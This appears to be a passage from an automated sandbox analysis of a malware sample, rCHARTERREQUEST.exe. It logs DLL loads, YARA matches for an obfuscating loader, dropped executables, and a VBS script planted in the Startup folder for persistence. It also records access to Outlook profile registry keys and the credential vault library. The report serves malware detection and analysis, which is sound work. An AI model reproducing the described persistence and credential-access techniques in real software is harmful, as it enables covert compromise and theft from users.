                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: secur32.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: schannel.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mskeyprotect.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ntasn1.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncrypt.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncryptsslp.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msasn1.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: gpapi.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vaultcli.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wintypes.dll
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                        Source: rCHARTERREQUEST.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                        Source: rCHARTERREQUEST.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: rCHARTERREQUEST.exe, 00000000.00000002.1930403057.00000000063D0000.00000004.08000000.00040000.00000000.sdmp, rCHARTERREQUEST.exe, 00000000.00000002.1927556031.0000000004149000.00000004.00000800.00020000.00000000.sdmp, ilsucsfth.exe, 00000007.00000002.2409994915.0000000003F29000.00000004.00000800.00020000.00000000.sdmp, ilsucsfth.exe, 00000007.00000002.2409994915.000000000419E000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: rCHARTERREQUEST.exe, 00000000.00000002.1930403057.00000000063D0000.00000004.08000000.00040000.00000000.sdmp, rCHARTERREQUEST.exe, 00000000.00000002.1927556031.0000000004149000.00000004.00000800.00020000.00000000.sdmp, ilsucsfth.exe, 00000007.00000002.2409994915.0000000003F29000.00000004.00000800.00020000.00000000.sdmp, ilsucsfth.exe, 00000007.00000002.2409994915.000000000419E000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: protobuf-net.pdbSHA256}Lq source: rCHARTERREQUEST.exe, 00000000.00000002.1933402312.0000000006C10000.00000004.08000000.00040000.00000000.sdmp, ilsucsfth.exe, 00000007.00000002.2409994915.0000000004493000.00000004.00000800.00020000.00000000.sdmp, ilsucsfth.exe, 00000007.00000002.2409994915.00000000043AF000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: protobuf-net.pdb source: rCHARTERREQUEST.exe, 00000000.00000002.1933402312.0000000006C10000.00000004.08000000.00040000.00000000.sdmp, ilsucsfth.exe, 00000007.00000002.2409994915.0000000004493000.00000004.00000800.00020000.00000000.sdmp, ilsucsfth.exe, 00000007.00000002.2409994915.00000000043AF000.00000004.00000800.00020000.00000000.sdmp

                        Data Obfuscation

                        barindex
                        Yara detected Costura Assembly Loader
                        Source: Yara matchFile source: 7.2.ilsucsfth.exe.432fabe.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.rCHARTERREQUEST.exe.6c70000.8.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 7.2.ilsucsfth.exe.432fabe.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.rCHARTERREQUEST.exe.6c70000.8.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 7.2.ilsucsfth.exe.43af2b0.9.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 7.2.ilsucsfth.exe.42cfa7e.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 7.2.ilsucsfth.exe.42efa9e.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 7.2.ilsucsfth.exe.43af2b0.9.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000002.1933791791.0000000006C70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000007.00000002.2409994915.00000000043AF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1918032779.000000000318D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000007.00000002.2409994915.0000000004235000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000007.00000002.2389088935.0000000002F6E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: rCHARTERREQUEST.exe PID: 7388, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: ilsucsfth.exe PID: 8128, type: MEMORYSTR
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeCode function: 0_2_06438DE8 pushfd ; ret 0_2_06438DE9
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeCode function: 0_2_06438DA2 push esp; ret 0_2_06438DA9
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeCode function: 0_2_0643CA0A pushad ; retf 0_2_0643CA0B
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeCode function: 0_2_06432B9F push es; ret 0_2_06432BB0
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeCode function: 0_2_0643A158 push es; ret 0_2_0643A164
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeCode function: 0_2_06B8F405 push FFFFFF8Bh; iretd 0_2_06B8F407
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeCode function: 0_2_06B84AD1 push es; ret 0_2_06B84AE0
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeCode function: 0_2_06B8F3B4 push FFFFFF8Bh; ret 0_2_06B8F3B6
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeCode function: 0_2_06B8F3ED push FFFFFF8Bh; ret 0_2_06B8F3F0
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeCode function: 0_2_06B82357 push es; ret 0_2_06B82358
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeCode function: 0_2_06B86805 push es; iretd 0_2_06B8680C
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeCode function: 0_2_06B86879 push es; iretd 0_2_06B86884
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeCode function: 0_2_06B879AE push es; retf 0_2_06B879BC
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeCode function: 0_2_06C64A93 push es; retf 0_2_06C64AB8
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeCode function: 0_2_06C64A5D push es; iretd 0_2_06C64B74
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeCode function: 0_2_06C64B55 push es; iretd 0_2_06C64B74
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeCode function: 0_2_06D33E2F push es; iretd 0_2_06D33E60
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeCode function: 0_2_06D31939 push edx; ret 0_2_06D3193A
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeCode function: 0_2_06D47B51 push es; ret 0_2_06D47B60
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeCode function: 0_2_06D867D3 pushad ; retf 0_2_06D867D4
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeCode function: 0_2_06D86541 push ss; iretd 0_2_06D86547
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeCode function: 0_2_06D8C517 push es; retf 0_2_06D8C518
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeCode function: 0_2_06D8650F pushad ; retf 0_2_06D86510
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeCode function: 0_2_06D882EB push eax; ret 0_2_06D882F1
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeCode function: 0_2_06D8BA9F push es; iretd 0_2_06D8BAA0
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeCode function: 0_2_06D8BA61 push es; iretd 0_2_06D8BA64
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeCode function: 0_2_06D8581A pushad ; retf 0_2_06D8581B
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeCode function: 0_2_06D8B9D0 push es; iretd 0_2_06D8BA24
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeCode function: 0_2_06DA9D02 push esp; retf 0_2_06DA9D05
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeCode function: 0_2_07043DB0 push esp; ret 0_2_07043DB3
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeCode function: 0_2_070435E6 push ds; retf 0_2_070435E9
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeFile created: C:\Users\user\AppData\Local\Temp\ckuv.exeJump to dropped file
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeFile created: C:\Users\user\AppData\Roaming\ilsucsfth.exeJump to dropped file

                        Boot Survival

                        barindex
                        Drops VBS files to the startup folder
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ilsucsfth.vbsJump to dropped file
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ilsucsfth.vbsJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ilsucsfth.vbsJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ckuv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
